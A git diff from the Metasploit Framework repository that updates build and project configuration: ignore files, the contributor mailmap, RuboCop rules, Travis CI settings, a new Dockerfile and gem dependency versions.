land #8913 , fix false positives of telnet scanner vs http servers

expand the check for weird HTTP / HTML serving servers
Land #8888 from @h00die, with two extra fixes
2017-08-31 16:31:08 -05:00 · 2017-08-31 16:30:02 -05:00 · 2017-08-31 14:37:02 -05:00 · 2017-08-31 14:29:23 -05:00 · 2017-08-31 14:29:05 -05:00 · 2017-08-31 12:25:05 -05:00
4383 changed files with 87249 additions and 31581 deletions
@@ -0,0 +1,102 @@
+.dockerignore
+.gitignore
+.env*
+docker-compose*.yml
+docker/
+!docker/msfconsole.rc
+README.md
+.git/
+.github/
+.ruby-version
+.ruby-gemset
+
+.bundle
+Gemfile.local
+Gemfile.local.lock
+# Rubymine project directory
+.idea
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
+.rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
+# YARD cache directory
+.yardoc
+# Mac OS X files
+.DS_Store
+# database config for testing
+config/database.yml
+# target config file for testing
+features/support/targets.yml
+# simplecov coverage data
+coverage
+doc/
+external/source/meterpreter/java/bin
+external/source/meterpreter/java/build
+external/source/meterpreter/java/extensions
+external/source/javapayload/bin
+external/source/javapayload/build
+# Java binary ignores. Replace the 5 above with this once we're merged.
+external/source/javapayload/*/.classpath
+external/source/javapayload/*/.project
+external/source/javapayload/*/.settings
+external/source/javapayload/*/bin
+external/source/javapayload/*/target
+external/source/javapayload/*/*/.classpath
+external/source/javapayload/*/*/.project
+external/source/javapayload/*/*/.settings
+external/source/javapayload/*/*/bin
+external/source/javapayload/*/*/target
+# Packaging directory
+pkg
+tags
+*.swp
+*.orig
+*.rej
+*~
+# Ignore backups of retabbed files
+*.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# Rails log directory
+/log
+# Rails tmp directory
+/tmp
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release
+
+# Avoid checking in Meterpreter binaries. These are supplied upstream by
+# the metasploit-payloads gem.
+data/meterpreter/*.dll
+data/meterpreter/*.php
+data/meterpreter/*.py
+data/meterpreter/*.bin
+data/meterpreter/*.jar
+data/meterpreter/*.lso
+data/android
+data/java
+
+# Avoid checking in Meterpreter libs that are built from
+# private source. If you're interested in this functionality,
+# check out Metasploit Pro: https://metasploit.com/download
+data/meterpreter/ext_server_pivot.*.dll
+
+# Avoid checking in metakitty, the source for
+# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
+/metakitty
+.vagrant
+
+# no need for rspecs
+spec/
@@ -11,4 +11,5 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
+- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

@@ -78,10 +78,17 @@ data/java

 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll

 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
+
+# local docker compose overrides
+docker-compose.local*
+
+# Ignore python bytecode
+*.pyc
+rspec.failures
@@ -1,58 +1,56 @@
-acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     Brendan <bwatters@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     Brendan Watters <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
-farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     James Barnett <James_Barnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
-jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
-jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
-kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         l0gan <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
-lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         Pearce Barry <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Davis <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           tdoan-r7 <thao_doan@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           thao doan <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
-todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
+bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
+bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
+egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                 <james_lee@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>       <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
+kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+tatanus <tatanus@github>             <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             <todb@metasploit.com>
+todb-r7 <todb-r7@github>             <todb@packetfu.com>
 wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
-wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           wwebb-r7 <William_Webb@rapid7.com>
+wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
+wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -66,15 +64,14 @@ bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
+brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
+bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
-Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
+Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -85,22 +82,24 @@ crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
-espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
+farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
+FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
+gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
+gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
+h00die <h00die@github>                 <h00die@users.noreply.github.com>
+h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
+hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
-jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -108,9 +107,9 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
@@ -139,15 +138,20 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
+RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
+RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
+rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
+rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
+stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
@@ -157,10 +161,10 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-void-in <void-in@github>               root <void-in@users.noreply.github.com>
-void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               void-in <root@localhost.localdomain>
+void-in <void-in@github>               <void-in@users.noreply.github.com>
+void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

@@ -8,18 +8,57 @@

 # inherit_from: .rubocop_todo.yml

+AllCops:
+  TargetRubyVersion: 2.2
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
  Exclude:
    - 'modules/**/*'

+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
+Style/RedundantReturn:
+  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'

+Layout/IndentHeredoc:
+  Enabled: false
+  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+
+Style/GuardClause:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/ConditionalAssignment:
+  Enabled: false
+  Description: 'This is confusing for folks coming from other languages'
+
 Style/Encoding:
  Enabled: true
  Description: 'We prefer binary to UTF-8.'
@@ -53,7 +92,7 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Style/SpaceInsideBrackets:
+Layout/SpaceInsideBrackets:
  Enabled: false
  Description: 'Until module template are final, most modules will fail this.'

@@ -1 +1 @@
-2.3.3
+2.4.1
@@ -1,24 +1,29 @@
+dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.3'
+  postgresql: '9.6'
  apt:
    packages:
      - libpcap-dev
      - graphviz
 language: ruby
 rvm:
-  - '2.3.3'
+  - '2.2'
+  - '2.3.4'
+  - '2.4.1'

 env:
-  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
-  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
-  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

 matrix:
  fast_finish: true
+  include:
+  - rvm: ruby-head
+    env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
 before_install:
  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
@@ -26,14 +31,18 @@ before_install:
  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
-script:
  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+  - bash -c "${CMD}"

 notifications:
  irc: "irc.freenode.org#msfnotify"
@@ -46,3 +55,6 @@ branches:
  except:
    - gh-pages
    - metakitty
+
+services:
+  - docker
@@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2016, Rapid7, Inc.
+Copyright (C) 2006-2017, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -0,0 +1,54 @@
+FROM ruby:2.4.1-alpine
+MAINTAINER Rapid7
+
+ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ENV APP_HOME /usr/src/metasploit-framework/
+ENV MSF_USER msf
+ENV NMAP_PRIVILEGED=""
+WORKDIR $APP_HOME
+
+COPY Gemfile* m* Rakefile $APP_HOME
+COPY lib $APP_HOME/lib
+
+RUN apk update && \
+    apk add \
+      sqlite-libs \
+      nmap \
+      nmap-scripts \
+      nmap-nselibs \
+      postgresql-libs \
+      ncurses \
+      libcap \
+    && apk add --virtual .ruby-builddeps \
+      autoconf \
+      bison \
+      build-base \
+      ruby-dev \
+      openssl-dev \
+      readline-dev \
+      sqlite-dev \
+      postgresql-dev \
+      libpcap-dev \
+      libxml2-dev \
+      libxslt-dev \
+      yaml-dev \
+      zlib-dev \
+      ncurses-dev \
+      git \
+    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
+    && gem update --system \
+    && gem install bundler \
+    && bundle install --system $BUNDLER_ARGS \
+    && apk del .ruby-builddeps \
+    && rm -rf /var/cache/apk/*
+
+RUN adduser -g msfconsole -D $MSF_USER
+
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
+
+USER $MSF_USER
+
+ADD ./ $APP_HOME
+
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
@@ -6,8 +6,6 @@ gemspec name: 'metasploit-framework'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
  gem 'simplecov'
 end

@@ -19,8 +17,10 @@ group :development do
  # for development and testing purposes
  gem 'pry'
  # module documentation
-  gem 'octokit', '~> 4.0'
-  # rails-upgrade staging gems
+  gem 'octokit'
+  # Metasploit::Aggregator external session proxy
+  # Disabled for now for crypttlv updates
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -33,14 +33,10 @@ group :development, :test do
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
+  gem 'rspec-rerun'
 end

 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -27,8 +27,6 @@ end

 # Create a custom group
 group :local do
-  # Use pry-debugger to step through code during development
-  gem 'pry-debugger', '~> 0.2'
  # Add the lab gem so that the 'lab' plugin will work again
  gem 'lab', '~> 0.2.7'
 end
@@ -1,12 +1,15 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.13.3)
+    metasploit-framework (4.16.4)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
+      backports
      bcrypt
+      bcrypt_pbkdf
      bit-struct
+      dnsruby
      filesize
      jsobfu
      json
@@ -14,13 +17,14 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.2.1)
+      metasploit-payloads (= 1.3.1)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.2)
+      metasploit_payloads-mettle (= 0.2.2)
      msgpack
      nessus_rest
      net-ssh
      network_interface
+      nexpose
      nokogiri
      octokit
      openssl-ccm
@@ -28,12 +32,15 @@ PATH
      packetfu
      patch_finder
      pcaprub
-      pg
+      pdf-reader
+      pg (= 0.20.0)
      railties
-      rb-readline-r7
+      rb-readline
+      rbnacl (< 5.0.0)
+      rbnacl-libsodium
      recog
      redcarpet
-      rex-arch (= 0.1.2)
+      rex-arch
      rex-bin_tools
      rex-core
      rex-encoder
@@ -42,7 +49,7 @@ PATH
      rex-mime
      rex-nop
      rex-ole
-      rex-powershell
+      rex-powershell (< 0.1.73)
      rex-random_identifier
      rex-registry
      rex-rop_builder
@@ -51,7 +58,7 @@ PATH
      rex-struct2
      rex-text
      rex-zip
-      robots
+      ruby_smb
      rubyntlm
      rubyzip
      sqlite3
@@ -59,118 +66,92 @@ PATH
      tzinfo
      tzinfo-data
      windows_error
+      xdr
+      xmlrpc

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.7.1)
-      actionview (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    Ascii85 (1.0.2)
+    actionpack (4.2.9)
+      actionview (= 4.2.9)
+      activesupport (= 4.2.9)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionview (4.2.9)
+      activesupport (= 4.2.9)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
-      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    activemodel (4.2.7.1)
-      activesupport (= 4.2.7.1)
+      rails-html-sanitizer (~> 1.0, >= 1.0.3)
+    activemodel (4.2.9)
+      activesupport (= 4.2.9)
      builder (~> 3.1)
-    activerecord (4.2.7.1)
-      activemodel (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activerecord (4.2.9)
+      activemodel (= 4.2.9)
+      activesupport (= 4.2.9)
      arel (~> 6.0)
-    activesupport (4.2.7.1)
+    activesupport (4.2.9)
      i18n (~> 0.7)
-      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.0)
-      public_suffix (~> 2.0, >= 2.0.2)
-    arel (6.0.3)
-    arel-helpers (2.3.0)
+    addressable (2.5.2)
+      public_suffix (>= 2.0.2, < 4.0)
+    afm (0.2.2)
+    arel (6.0.4)
+    arel-helpers (2.4.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
+    backports (3.8.0)
    bcrypt (3.1.11)
-    bit-struct (0.15.0)
-    builder (3.2.2)
-    capybara (2.10.1)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
